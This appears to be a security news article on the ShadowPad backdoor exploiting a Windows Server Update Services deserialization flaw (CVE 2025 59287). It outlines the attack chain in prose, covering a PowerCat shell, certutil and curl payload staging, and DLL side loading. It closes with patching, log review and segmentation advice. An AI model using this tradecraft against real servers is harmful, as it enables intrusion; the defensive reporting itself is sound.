Security researchers have confirmed that the ShadowPad malware is actively exploiting a recently patched vulnerability in Windows Server Update Services known as CVE 2025 59287, enabling attackers to gain full system level access to targeted servers. The flaw is a critical deserialization defect that allows remote code execution on unpatched WSUS instances, giving intruders a direct foothold inside enterprise environments.
Once inside, attackers use the PowerCat PowerShell utility to establish a system shell and then deploy ShadowPad using standard Windows commands including certutil and curl. This enables them to bypass standard endpoint defenses. ShadowPad, widely associated with Chinese state aligned threat groups, is considered one of the most advanced modular backdoors in active use today. In these intrusions, the malware relies on DLL side loading, where a legitimate executable such as ETDCtrlHelper.exe loads a malicious DLL that launches ShadowPad in memory. This technique allows the malware to remain stealthy, load additional modules, harvest information and move laterally without leaving traces on disk.
What makes this attack particularly alarming is the abuse of WSUS, a Microsoft tool trusted by enterprises to distribute patches across entire server fleets. By compromising WSUS, attackers can piggyback on the very infrastructure that organisations rely on to secure their networks. This method mirrors the supply chain compromises seen in large scale incidents where attackers target one central point to reach thousands of connected systems. After proof of concept exploit code surfaced publicly, threat actors rapidly adopted the vulnerability and began deploying ShadowPad against unpatched WSUS servers worldwide.
Because WSUS is present in government agencies, financial institutions, manufacturers and large corporations, the potential reach of this campaign is significant. The flaw gives attackers not just initial access but systemic control of servers, allowing them to deploy espionage modules, credential theft tools or even ransomware operations.
Security teams must immediately verify whether their WSUS servers have applied the November patch addressing CVE 2025 59287. Any WSUS instance exposed to external networks should be considered high risk. Administrators should review logs for unexpected certutil or curl executions, inspect for signs of PowerCat abuse, and monitor for memory based payloads loaded through DLL side loading.
Further protections include restricting access to WSUS infrastructure, disabling unauthenticated interactions, isolating patch management servers using strict network segmentation and enabling behavior based detection capable of identifying anomalous update system activity.
The ShadowPad campaign highlights an unmistakable shift in attacker priorities. Threat groups are no longer simply targeting endpoints or email users; they are turning trusted infrastructure itself into an attack surface. Software update channels once assumed safe are now prime targets. The message for defenders is clear: even the tools designed to protect an organisation may become the entry point for its compromise if not carefully secured.